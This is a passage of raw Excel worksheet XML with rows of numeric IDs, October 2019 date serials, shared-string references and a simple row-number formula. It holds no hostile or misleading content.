      <c r="G14369" t="s">
        <v>24807</v>
      </c>
    </row>
    <row r="14370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14370">
        <f t="shared" si="224"/>
        <v>14369</v>
      </c>
      <c r="B14370">
        <v>4369</v>
      </c>
      <c r="C14370" t="s">
        <v>19637</v>
      </c>
      <c r="D14370" s="1">
        <v>43744</v>
      </c>
      <c r="E14370" t="s">
        <v>19640</v>
      </c>
      <c r="F14370" t="s">
        <v>9975</v>
      </c>
      <c r="G14370" t="s">
        <v>24808</v>
      </c>
    </row>
    <row r="14371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14371">
        <f t="shared" si="224"/>
        <v>14370</v>
      </c>
      <c r="B14371">
        <v>4370</v>
      </c>
      <c r="C14371" t="s">
        <v>19637</v>
      </c>
      <c r="D14371" s="1">
        <v>43754</v>
      </c>
      <c r="E14371" t="s">
        <v>20525</v>
      </c>
      <c r="F14371" t="s">
        <v>10021</v>
      </c>
      <c r="G14371" t="s">
        <v>24809</v>
      </c>
    </row>
    <row r="14372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14372">
        <f t="shared" si="224"/>
        <v>14371</v>
      </c>
      <c r="B14372">
        <v>4371</v>
      </c>
      <c r="C14372" t="s">
        <v>19637</v>
      </c>
      <c r="D14372" s="1">
        <v>43755</v>
      </c>
      <c r="E14372" t="s">
        <v>23692</v>
      </c>
      <c r="F14372" t="s">
        <v>10021</v>
      </c>
      <c r="G14372" t="s">
        <v>24810</v>
      </c>
    </row>
    <row r="14373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14373">
        <f t="shared" si="224"/>
        <v>14372</v>
      </c>
      <c r="B14373">
        <v>4372</v>
      </c>
      <c r="C14373" t="s">
        <v>19637</v>
      </c>
      <c r="D14373" s="1">
        <v>43744</v>
      </c>
      <c r="E14373" t="s">
        <v>24811</v>
      </c>
      <c r="F14373" t="s">
        <v>10021</v>
      </c>
      <c r="G14373" t="s">
        <v>24812</v>
      </c>
    </row>
    <row r="14374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14374">
        <f t="shared" si="224"/>
        <v>14373</v>
      </c>
      <c r="B14374">
        <v>4373</v>
      </c>
      <c r="C14374" t="s">
        <v>19637</v>
      </c>
      <c r="D14374" s="1">
        <v>43744</v>
      </c>
      <c r="F14374" t="s">
        <v>10526</v>
      </c>
      <c r="G14374" t="s">
        <v>24813</v>
      </c>
    </row>
    <row r="14375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14375">
        <f t="shared" si="224"/>
        <v>14374</v>
      </c>
      <c r="B14375">
        <v>4374</v>
      </c>
      <c r="C14375" t="s">
        <v>19637</v>
      </c>
      <c r="D14375" s="1">
        <v>43748</v>
      </c>
      <c r="E14375" t="s">
        <v>19645</v>
      </c>
      <c r="F14375" t="s">
        <v>9975</v>
      </c>
      <c r="G14375" t="s">
        <v>24814</v>
      </c>
    </row>
    <row r="14376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14376">
        <f t="shared" si="224"/>
        <v>14375</v>
      </c>
      <c r="B14376">
        <v>4375</v>
      </c>
      <c r="C14376" t="s">
        <v>19637</v>
      </c>
      <c r="D14376" s="1">
        <v>43748</v>
      </c>
      <c r="E14376" t="s">
        <v>21090</v>
      </c>
      <c r="F14376" t="s">
        <v>10021</v>
      </c>
      <c r="G14376" t="s">
        <v>24815</v>
      </c>
    </row>
    <row r="14377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14377">
        <f t="shared" si="224"/>
        <v>14376</v>
      </c>
      <c r="B14377">
        <v>4376</v>
      </c>
      <c r="C14377" t="s">
        <v>19637</v>
      </c>
      <c r="D14377" s="1">
        <v>43755</v>
      </c>
      <c r="E14377" t="s">
        <v>20349</v>
      </c>
      <c r="F14377" t="s">
        <v>9978</v>
      </c>
      <c r="G14377" t="s">
        <v>24816</v>
      </c>
    </row>
    <row r="14378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14378">
        <f t="shared" si="224"/>
        <v>14377</v>
      </c>
      <c r="B14378">
        <v>4377</v>
      </c>
      <c r="C14378" t="s">
        <v>19637</v>
      </c>
      <c r="D14378" s="1">
        <v>43739</v>
      </c>
      <c r="E14378" t="s">
        <v>19640</v>
      </c>
      <c r="F14378" t="s">
        <v>9975</v>
      </c>
      <c r="G14378" t="s">
        <v>24817</v>
      </c>
    </row>
    <row r="14379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14379">
        <f t="shared" si="224"/>
        <v>14378</v>
      </c>
      <c r="B14379">
        <v>4378</v>
      </c>
      <c r="C14379" t="s">
        <v>19637</v>
      </c>
      <c r="D14379" s="1">
        <v>43740</v>
      </c>
      <c r="E14379" t="s">
        <v>19640</v>
      </c>
      <c r="F14379" t="s">
        <v>9975</v>
      </c>
      <c r="G14379" t="s">
        <v>24818</v>
      </c>
    </row>
    <row r="14380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14380">
        <f t="shared" si="224"/>
        <v>14379</v>
      </c>
      <c r="B14380">
        <v>4379</v>
      </c>
      <c r="C14380" t="s">
        <v>19637</v>
      </c>
      <c r="D14380" s="1">
        <v>43739</v>
      </c>
      <c r="F14380" t="s">
        <v>10526</v>
      </c>
      <c r="G14380" t="s">
        <v>24819</v>
      </c>
    </row>
    <row r="14381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14381">
        <f t="shared" si="224"/>
        <v>14380</v>
      </c>
      <c r="B14381">
        <v>4380</v>
      </c>
      <c r="C14381" t="s">
        <v>19637</v>
      </c>
      <c r="D14381" s="1">
        <v>43756</v>
      </c>
      <c r="E14381" t="s">
        <v>24820</v>
      </c>
      <c r="F14381" t="s">
        <v>10021</v>
      </c>
      <c r="G14381" t="s">
        <v>24821</v>
      </c>
    </row>
    <row r="14382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14382">
        <f t="shared" si="224"/>
        <v>14381</v>
      </c>
      <c r="B14382">
        <v>4381</v>
      </c>
      <c r="C14382" t="s">
        <v>19637</v>
      </c>
      <c r="D14382" s="1">
        <v>43754</v>
      </c>
      <c r="E14382" t="s">
        <v>22739</v>
      </c>
      <c r="F14382" t="s">
        <v>10526</v>
      </c>
      <c r="G14382" t="s">
        <v>24822</v>
      </c>
    </row>
    <row r="14383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14383">
        <f t="shared" si="224"/>
        <v>14382</v>
      </c>
      <c r="B14383">
        <v>4382</v>
      </c>
      <c r="C14383" t="s">
        <v>19637</v>
      </c>
      <c r="D14383" s="1">
        <v>43757</v>
      </c>
      <c r="F14383" t="s">
        <v>10526</v>
      </c>
      <c r="G14383" t="s">
        <v>24823</v>
      </c>
    </row>
    <row r="14384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14384">
        <f t="shared" si="224"/>
        <v>14383</v>
      </c>
      <c r="B14384">
        <v>4383</v>
      </c>
      <c r="C14384" t="s">
        <v>19637</v>
      </c>
      <c r="D14384" s="1">
        <v>43755</v>
      </c>
      <c r="E14384" t="s">
        <v>24824</v>
      </c>
      <c r="F14384" t="s">
        <v>10021</v>
      </c>
      <c r="G14384" t="s">
        <v>24825</v>
      </c>
    </row>
    <row r="14385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14385">
        <f t="shared" si="224"/>
        <v>14384</v>
      </c>
      <c r="B14385">
        <v>4384</v>
      </c>
      <c r="C14385" t="s">
        <v>19637</v>
      </c>
      <c r="D14385" s="1">
        <v>43739</v>
      </c>
      <c r="E14385" t="s">
        <v>19840</v>
      </c>
      <c r="F14385" t="s">
        <v>10021</v>
      </c>
      <c r="G14385" t="s">
        <v>24826</v>
      </c>
    </row>
    <row r="14386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14386">
        <f t="shared" si="224"/>
        <v>14385</v>
      </c>
      <c r="B14386">
        <v>4385</v>
      </c>
      <c r="C14386" t="s">
        <v>19637</v>
      </c>
      <c r="D14386" s="1">
        <v>43745</v>
      </c>
      <c r="E14386" t="s">
        <v>19743</v>
      </c>
      <c r="F14386" t="s">
        <v>10021</v>
      </c>
      <c r="G14386" t="s">
        <v>24827</v>
      </c>
    </row>
    <row r="14387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14387">
        <f t="shared" si="224"/>
        <v>14386</v>
      </c>
      <c r="B14387">
        <v>4386</v>
      </c>
      <c r="C14387" t="s">
        <v>19637</v>
      </c>
      <c r="D14387" s="1">
        <v>43743</v>
      </c>
      <c r="E14387" t="s">
        <v>24828</v>
      </c>
      <c r="F14387" t="s">
        <v>9978</v>
      </c>
      <c r="G14387" t="s">
        <v>24829</v>
      </c>
    </row>
    <row r="14388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14388">
        <f t="shared" si="224"/>
        <v>14387</v>
      </c>
      <c r="B14388">
        <v>4387</v>
      </c>
      <c r="C14388" t="s">
        <v>19637</v>
      </c>
      <c r="D14388" s="1">
        <v>43756</v>
      </c>
      <c r="E14388" t="s">
        <v>24830</v>
      </c>
      <c r="F14388" t="s">
        <v>10526</v>
      </c>
      <c r="G14388" t="s">
        <v>24831</v>
      </c>
    </row>
    <row r="14389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14389">
        <f t="shared" si="224"/>
        <v>14388</v>
      </c>
      <c r="B14389">
        <v>4388</v>
      </c>
      <c r="C14389" t="s">
        <v>19637</v>
      </c>
      <c r="D14389" s="1">
        <v>43740</v>
      </c>
      <c r="E14389" t="s">
        <v>19750</v>
      </c>
      <c r="F14389" t="s">
        <v>9978</v>
      </c>
      <c r="G14389" t="s">
        <v>24832</v>
      </c>
    </row>
    <row r="14390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14390">
        <f t="shared" si="224"/>
        <v>14389</v>
      </c>
      <c r="B14390">
        <v>4389</v>
      </c>
      <c r="C14390" t="s">
        <v>19637</v>
      </c>
      <c r="D14390" s="1">
        <v>43742</v>
      </c>
      <c r="E14390" t="s">
        <v>23769</v>
      </c>
      <c r="F14390" t="s">
        <v>10526</v>
      </c>
      <c r="G14390" t="s">
        <v>24833</v>
      </c>
    </row>
    <row r="14391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14391">
        <f t="shared" si="224"/>
        <v>14390</v>
      </c>
      <c r="B14391">
        <v>4390</v>
      </c>
      <c r="C14391" t="s">
        <v>19637</v>
      </c>
      <c r="D14391" s="1">
        <v>43740</v>
      </c>
      <c r="E14391" t="s">
        <v>19640</v>
      </c>
      <c r="F14391" t="s">
        <v>9975</v>
      </c>
      <c r="G14391" t="s">
        <v>24834</v>
      </c>
    </row>
    <row r="14392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14392">
        <f t="shared" si="224"/>
        <v>14391</v>
      </c>
      <c r="B14392">
        <v>4391</v>
      </c>
      <c r="C14392" t="s">
        <v>19637</v>
      </c>
      <c r="D14392" s="1">
        <v>43743</v>
      </c>
      <c r="F14392" t="s">
        <v>10526</v>
      </c>
      <c r="G14392" t="s">
        <v>24835</v>
      </c>
    </row>
    <row r="14393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14393">
        <f t="shared" si="224"/>
        <v>14392</v>
      </c>
      <c r="B14393">
        <v>4392</v>
      </c>
      <c r="C14393" t="s">
        <v>19637</v>
      </c>
      <c r="D14393" s="1">
        <v>43749</v>
      </c>
      <c r="E14393" t="s">
        <v>20250</v>
      </c>
      <c r="F14393" t="s">
        <v>10021</v>
      </c>
      <c r="G14393" t="s">
        <v>24836</v>
      </c>
    </row>
    <row r="14394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14394">
        <f t="shared" si="224"/>
        <v>14393</v>
      </c>
      <c r="B14394">
        <v>4393</v>
      </c>
      <c r="C14394" t="s">
        <v>19637</v>
      </c>
      <c r="D14394" s="1">
        <v>43753</v>
      </c>
      <c r="E14394" t="s">
        <v>19843</v>
      </c>
      <c r="F14394" t="s">
        <v>10526</v>
      </c>
      <c r="G14394" t="s">
        <v>24837</v>
      </c>
    </row>
    <row r="14395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14395">
        <f t="shared" si="224"/>
        <v>14394</v>
      </c>
      <c r="B14395">
        <v>4394</v>
      </c>
      <c r="C14395" t="s">
        <v>19637</v>
      </c>
      <c r="D14395" s="1">
        <v>43749</v>
      </c>
      <c r="E14395" t="s">
        <v>24838</v>
      </c>
      <c r="F14395" t="s">
        <v>10021</v>
      </c>
      <c r="G14395" t="s">
        <v>24839</v>
      </c>
    </row>
    <row r="14396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14396">
        <f t="shared" si="224"/>
        <v>14395</v>
      </c>
      <c r="B14396">
        <v>4395</v>
      </c>
      <c r="C14396" t="s">
        <v>19637</v>
      </c>
      <c r="D14396" s="1">
        <v>43742</v>
      </c>
      <c r="E14396" t="s">
        <v>19640</v>
      </c>
      <c r="F14396" t="s">
        <v>9975</v>
      </c>
      <c r="G14396" t="s">
        <v>24840</v>
      </c>
    </row>
    <row r="14397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14397">
        <f t="shared" si="224"/>
        <v>14396</v>
      </c>
      <c r="B14397">
        <v>4396</v>
      </c>
      <c r="C14397" t="s">
        <v>19637</v>
      </c>
      <c r="D14397" s="1">
        <v>43745</v>
      </c>
      <c r="E14397" t="s">
        <v>19640</v>
      </c>
      <c r="F14397" t="s">
        <v>10021</v>
      </c>
      <c r="G14397" t="s">
        <v>24841</v>
      </c>
    </row>
    <row r="14398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14398">
        <f t="shared" si="224"/>
        <v>14397</v>
      </c>
      <c r="B14398">
        <v>4397</v>
      </c>
      <c r="C14398" t="s">
        <v>19637</v>
      </c>
      <c r="D14398" s="1">
        <v>43753</v>
      </c>
      <c r="E14398" t="s">
        <v>19680</v>
      </c>
      <c r="F14398" t="s">
        <v>10021</v>
      </c>
      <c r="G14398" t="s">
        <v>24842</v>
      </c>
    </row>
    <row r="14399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14399">
        <f t="shared" si="224"/>
        <v>14398</v>
      </c>
      <c r="B14399">
        <v>4398</v>
      </c>
      <c r="C14399" t="s">
        <v>19637</v>
      </c>
      <c r="D14399" s="1">
        <v>43748</v>
      </c>
      <c r="E14399" t="s">
        <v>19785</v>
      </c>
      <c r="F14399" t="s">
        <v>9975</v>
      </c>
      <c r="G14399" t="s">
        <v>24843</v>
      </c>
    </row>
    <row r="14400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14400">
        <f t="shared" si="224"/>
        <v>14399</v>
      </c>
      <c r="B14400">
        <v>4399</v>
      </c>
      <c r="C14400" t="s">
        <v>19637</v>
      </c>
      <c r="D14400" s="1">
        <v>43753</v>
      </c>
      <c r="E14400" t="s">
        <v>20862</v>
      </c>
      <c r="F14400" t="s">
        <v>10021</v>
      </c>
      <c r="G14400" t="s">
        <v>24844</v>
      </c>
    </row>
    <row r="14401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14401">
        <f t="shared" si="224"/>
        <v>14400</v>
      </c>
      <c r="B14401">
        <v>4400</v>
      </c>
      <c r="C14401" t="s">
        <v>19637</v>
      </c>
      <c r="D14401" s="1">
        <v>43749</v>
      </c>
      <c r="E14401" t="s">
        <v>20005</v>
      </c>
      <c r="F14401" t="s">
        <v>9975</v>
      </c>
      <c r="G14401" t="s">
        <v>24845</v>
      </c>
    </row>
    <row r="14402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14402">
        <f t="shared" si="224"/>
        <v>14401</v>
      </c>
      <c r="B14402">
        <v>4401</v>
      </c>
      <c r="C14402" t="s">
        <v>19637</v>
      </c>
      <c r="D14402" s="1">
        <v>43749</v>
      </c>
      <c r="E14402" t="s">
        <v>19638</v>
      </c>
      <c r="F14402" t="s">
        <v>10021</v>
      </c>
      <c r="G14402" t="s">
        <v>24846</v>
      </c>
    </row>
    <row r="14403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14403">
        <f t="shared" ref="A14403:A14466" si="225">+ROW(A14402)</f>
        <v>14402</v>
      </c>
      <c r="B14403">
        <v>4402</v>
      </c>
      <c r="C14403" t="s">
        <v>19637</v>
      </c>
      <c r="D14403" s="1">
        <v>43741</v>
      </c>
      <c r="E14403" t="s">
        <v>19750</v>
      </c>
      <c r="F14403" t="s">
        <v>9978</v>
      </c>
      <c r="G14403" t="s">
        <v>24847</v>
      </c>
    </row>
    <row r="14404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14404">
        <f t="shared" si="225"/>
        <v>14403</v>
      </c>
      <c r="B14404">
        <v>4403</v>
      </c>
      <c r="C14404" t="s">
        <v>19637</v>
      </c>
      <c r="D14404" s="1">
        <v>43747</v>
      </c>
      <c r="E14404" t="s">
        <v>19640</v>
      </c>
      <c r="F14404" t="s">
        <v>10021</v>
      </c>
      <c r="G14404" t="s">
        <v>24848</v>
      </c>
    </row>
    <row r="14405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14405">
        <f t="shared" si="225"/>
        <v>14404</v>
      </c>
      <c r="B14405">
        <v>4404</v>
      </c>
      <c r="C14405" t="s">
        <v>19637</v>
      </c>
      <c r="D14405" s="1">
        <v>43756</v>
      </c>
      <c r="E14405" t="s">
        <v>19971</v>
      </c>
      <c r="F14405" t="s">
        <v>9975</v>
      </c>
      <c r="G14405" t="s">
        <v>24849</v>
      </c>
    </row>
    <row r="14406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14406">
        <f t="shared" si="225"/>
        <v>14405</v>
      </c>
      <c r="B14406">
        <v>4405</v>
      </c>
      <c r="C14406" t="s">
        <v>19637</v>
      </c>
      <c r="D14406" s="1">
        <v>43753</v>
      </c>
      <c r="F14406" t="s">
        <v>10526</v>
      </c>
      <c r="G14406" t="s">
        <v>24850</v>
      </c>
    </row>
    <row r="14407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14407">
        <f t="shared" si="225"/>
        <v>14406</v>
      </c>
      <c r="B14407">
        <v>4406</v>
      </c>
      <c r="C14407" t="s">
        <v>19637</v>
      </c>
      <c r="D14407" s="1">
        <v>43754</v>
      </c>
      <c r="F14407" t="s">
        <v>10526</v>
      </c>
      <c r="G14407" t="s">
        <v>24851</v>
      </c>
    </row>
    <row r="14408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14408">
        <f t="shared" si="225"/>
        <v>14407</v>
      </c>
      <c r="B14408">
        <v>4407</v>
      </c>
      <c r="C14408" t="s">
        <v>19637</v>
      </c>
      <c r="D14408" s="1">
        <v>43739</v>
      </c>
      <c r="E14408" t="s">
        <v>23436</v>
      </c>
      <c r="F14408" t="s">
        <v>9978</v>
      </c>
      <c r="G14408" t="s">
        <v>24852</v>
      </c>
    </row>
    <row r="14409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14409">
        <f t="shared" si="225"/>
        <v>14408</v>
      </c>
      <c r="B14409">
        <v>4408</v>
      </c>
      <c r="C14409" t="s">
        <v>19637</v>
      </c>
      <c r="D14409" s="1">
        <v>43746</v>
      </c>
      <c r="E14409" t="s">
        <v>24853</v>
      </c>
      <c r="F14409" t="s">
        <v>10526</v>
      </c>
      <c r="G14409" t="s">
        <v>24854</v>
      </c>
    </row>
    <row r="14410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14410">
        <f t="shared" si="225"/>
        <v>14409</v>
      </c>
      <c r="B14410">
        <v>4409</v>
      </c>
      <c r="C14410" t="s">
        <v>19637</v>
      </c>
      <c r="D14410" s="1">
        <v>43743</v>
      </c>
      <c r="E14410" t="s">
        <v>20458</v>
      </c>
      <c r="F14410" t="s">
        <v>9978</v>
      </c>
      <c r="G14410" t="s">
        <v>24855</v>
      </c>
    </row>
    <row r="14411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14411">
        <f t="shared" si="225"/>
        <v>14410</v>
      </c>
      <c r="B14411">
        <v>4410</v>
      </c>
      <c r="C14411" t="s">
        <v>19637</v>
      </c>
      <c r="D14411" s="1">
        <v>43750</v>
      </c>
      <c r="F14411" t="s">
        <v>10526</v>
      </c>
      <c r="G14411" t="s">
        <v>24856</v>
      </c>
    </row>
    <row r="14412" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14412">
        <f t="shared" si="225"/>
        <v>14411</v>
      </c>
      <c r="B14412">
        <v>4411</v>
      </c>
      <c r="C14412" t="s">
        <v>19637</v>
      </c>
      <c r="D14412" s="1">
        <v>43756</v>
      </c>
      <c r="E14412" t="s">
        <v>24857</v>
      </c>
      <c r="F14412" t="s">
        <v>10526</v>
      </c>
      <c r="G14412" t="s">
        <v>24858</v>
      </c>
    </row>
    <row r="14413" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14413">
        <f t="shared" si="225"/>
        <v>14412</v>
      </c>
      <c r="B14413">
        <v>4412</v>
      </c>
      <c r="C14413" t="s">
        <v>19637</v>
      </c>
      <c r="D14413" s="1">
        <v>43746</v>
      </c>
      <c r="E14413" t="s">
        <v>24859</v>
      </c>
      <c r="F14413" t="s">
        <v>10021</v>
      </c>
      <c r="G14413" t="s">
        <v>24860</v>
      </c>
    </row>
    <row r="14414" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14414">
        <f t="shared" si="225"/>
        <v>14413</v>
      </c>
      <c r="B14414">
        <v>4413</v>
      </c>
      <c r="C14414" t="s">
        <v>19637</v>
      </c>
      <c r="D14414" s="1">
        <v>43752</v>
      </c>
      <c r="E14414" t="s">
        <v>24001</v>
      </c>
      <c r="F14414" t="s">
        <v>10021</v>
      </c>
      <c r="G14414" t="s">
        <v>24861</v>
      </c>
    </row>
    <row r="14415" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14415">
        <f t="shared" si="225"/>
        <v>14414</v>
      </c>
      <c r="B14415">
        <v>4414</v>
      </c>
      <c r="C14415" t="s">
        <v>19637</v>
      </c>
      <c r="D14415" s="1">
        <v>43739</v>
      </c>
      <c r="E14415" t="s">
        <v>19717</v>
      </c>
      <c r="F14415" t="s">
        <v>10526</v>
      </c>
      <c r="G14415" t="s">
        <v>24862</v>
      </c>
    </row>
    <row r="14416" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14416">
        <f t="shared" si="225"/>
        <v>14415</v>
      </c>
      <c r="B14416">
        <v>4415</v>
      </c>
      <c r="C14416" t="s">
        <v>19637</v>
      </c>
      <c r="D14416" s="1">
        <v>43741</v>
      </c>
      <c r="E14416" t="s">
        <v>19640</v>
      </c>
      <c r="F14416" t="s">
        <v>9975</v>
      </c>
      <c r="G14416" t="s">
        <v>24863</v>
      </c>
    </row>
    <row r="14417" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14417">
        <f t="shared" si="225"/>
        <v>14416</v>
      </c>
      <c r="B14417">
        <v>4416</v>
      </c>
      <c r="C14417" t="s">
        <v>19637</v>
      </c>
      <c r="D14417" s="1">
        <v>43755</v>
      </c>
      <c r="E14417" t="s">
        <v>22206</v>
      </c>
      <c r="F14417" t="s">
        <v>9978</v>
      </c>
      <c r="G14417" t="s">
        <v>24864</v>
      </c>
    </row>
    <row r="14418" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14418">
        <f t="shared" si="225"/>
        <v>14417</v>
      </c>
      <c r="B14418">
        <v>4417</v>
      </c>
      <c r="C14418" t="s">
        <v>19637</v>
      </c>
      <c r="D14418" s="1">
        <v>43750</v>
      </c>
      <c r="E14418" t="s">
        <v>24865</v>
      </c>
      <c r="F14418" t="s">
        <v>10526</v>
      </c>
      <c r="G14418" t="s">
        <v>24866</v>
      </c>
    </row>
    <row r="14419" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14419">
        <f t="shared" si="225"/>
        <v>14418</v>
      </c>
      <c r="B14419">
        <v>4418</v>
      </c>
      <c r="C14419" t="s">
        <v>19637</v>
      </c>
      <c r="D14419" s="1">
        <v>43750</v>
      </c>
      <c r="E14419" t="s">
        <v>19648</v>
      </c>
      <c r="F14419" t="s">
        <v>10021</v>
      </c>
      <c r="G14419" t="s">
        <v>24867</v>
      </c>
    </row>
    <row r="14420" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14420">
        <f t="shared" si="225"/>
        <v>14419</v>
      </c>
      <c r="B14420">
        <v>4419</v>
      </c>
      <c r="C14420" t="s">
        <v>19637</v>
      </c>
      <c r="D14420" s="1">
        <v>43740</v>
      </c>
      <c r="E14420" t="s">
        <v>19680</v>
      </c>
      <c r="F14420" t="s">
        <v>10021</v>
      </c>
      <c r="G14420" t="s">
        <v>24868</v>
      </c>
    </row>
    <row r="14421" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14421">
        <f t="shared" si="225"/>
        <v>14420</v>
      </c>
      <c r="B14421">
        <v>4420</v>
      </c>
      <c r="C14421" t="s">
        <v>19637</v>
      </c>
      <c r="D14421" s="1">
        <v>43755</v>
      </c>
      <c r="E14421" t="s">
        <v>19806</v>
      </c>
      <c r="F14421" t="s">
        <v>10526</v>
      </c>
      <c r="G14421" t="s">
        <v>24869</v>
      </c>
    </row>
    <row r="14422" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14422">
        <f t="shared" si="225"/>
        <v>14421</v>
      </c>
      <c r="B14422">
        <v>4421</v>
      </c>
      <c r="C14422" t="s">
        <v>19637</v>
      </c>
      <c r="D14422" s="1">
        <v>43745</v>
      </c>
      <c r="F14422" t="s">
        <v>10526</v>
      </c>
      <c r="G14422" t="s">
        <v>24870</v>
      </c>
    </row>
    <row r="14423" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14423">
        <f t="shared" si="225"/>
        <v>14422</v>
      </c>
      <c r="B14423">
        <v>4422</v>
      </c>
      <c r="C14423" t="s">
        <v>19637</v>
      </c>
      <c r="D14423" s="1">
        <v>43753</v>
      </c>
      <c r="E14423" t="s">
        <v>24871</v>
      </c>
      <c r="F14423" t="s">
        <v>10526</v>
      </c>
      <c r="G14423" t="s">
        <v>24872</v>
      </c>
    </row>
    <row r="14424" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14424">
        <f t="shared" si="225"/>
        <v>14423</v>
      </c>
      <c r="B14424">
        <v>4423</v>
      </c>
      <c r="C14424" t="s">
        <v>19637</v>
      </c>
      <c r="D14424" s="1">
        <v>43752</v>
      </c>
      <c r="E14424" t="s">
        <v>19640</v>
      </c>
      <c r="F14424" t="s">
        <v>9975</v>
      </c>
      <c r="G14424" t="s">
        <v>24873</v>
      </c>
    </row>
    <row r="14425" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14425">
        <f t="shared" si="225"/>
        <v>14424</v>
      </c>
      <c r="B14425">
        <v>4424</v>
      </c>
      <c r="C14425" t="s">
        <v>19637</v>
      </c>
      <c r="D14425" s="1">
        <v>43749</v>
      </c>
      <c r="E14425" t="s">
        <v>19640</v>
      </c>
      <c r="F14425" t="s">
        <v>9975</v>
      </c>
      <c r="G14425" t="s">
        <v>24874</v>
      </c>
    </row>
    <row r="14426" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14426">
        <f t="shared" si="225"/>
        <v>14425</v>
      </c>
      <c r="B14426">
        <v>4425</v>
      </c>
      <c r="C14426" t="s">
        <v>19637</v>
      </c>
      <c r="D14426" s="1">
        <v>43747</v>
      </c>
      <c r="E14426" t="s">
        <v>20322</v>
      </c>
      <c r="F14426" t="s">
        <v>10526</v>
      </c>
      <c r="G14426" t="s">
        <v>24875</v>
      </c>
    </row>
    <row r="14427" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14427">
        <f t="shared" si="225"/>
        <v>14426</v>
      </c>
      <c r="B14427">
        <v>4426</v>
      </c>
      <c r="C14427" t="s">
        <v>19637</v>
      </c>
      <c r="D14427" s="1">
        <v>43748</v>
      </c>
      <c r="F14427" t="s">
        <v>10526</v>
      </c>
      <c r="G14427" t="s">
        <v>24876</v>
      </c>
    </row>
    <row r="14428" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14428">
        <f t="shared" si="225"/>
        <v>14427</v>
      </c>
      <c r="B14428">
        <v>4427</v>
      </c>
      <c r="C14428" t="s">
        <v>19637</v>
      </c>
      <c r="D14428" s="1">
        <v>43754</v>
      </c>
      <c r="E14428" t="s">
        <v>24877</v>
      </c>
      <c r="F14428" t="s">
        <v>10526</v>
      </c>
      <c r="G14428" t="s">
        <v>24878</v>
      </c>
    </row>
    <row r="14429" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14429">
        <f t="shared" si="225"/>
        <v>14428</v>
      </c>
      <c r="B14429">
        <v>4428</v>
      </c>
      <c r="C14429" t="s">
        <v>19637</v>
      </c>
      <c r="D14429" s="1">
        <v>43755</v>
      </c>
      <c r="E14429" t="s">
        <v>19982</v>
      </c>
      <c r="F14429" t="s">
        <v>9978</v>
      </c>
      <c r="G14429" t="s">
        <v>24879</v>
      </c>
    </row>
    <row r="14430" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14430">
        <f t="shared" si="225"/>
        <v>14429</v>
      </c>
      <c r="B14430">
        <v>4429</v>
      </c>
      <c r="C14430" t="s">
        <v>19637</v>
      </c>
      <c r="D14430" s="1">
        <v>43740</v>
      </c>
      <c r="E14430" t="s">
        <v>19640</v>
      </c>
      <c r="F14430" t="s">
        <v>10021</v>
      </c>
      <c r="G14430" t="s">
        <v>24880</v>
      </c>
    </row>
    <row r="14431" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14431">
        <f t="shared" si="225"/>
        <v>14430</v>
      </c>
      <c r="B14431">
        <v>4430</v>
      </c>
      <c r="C14431" t="s">
        <v>19637</v>
      </c>
      <c r="D14431" s="1">
        <v>43749</v>
      </c>
      <c r="F14431" t="s">
        <v>10526</v>
      </c>
      <c r="G14431" t="s">
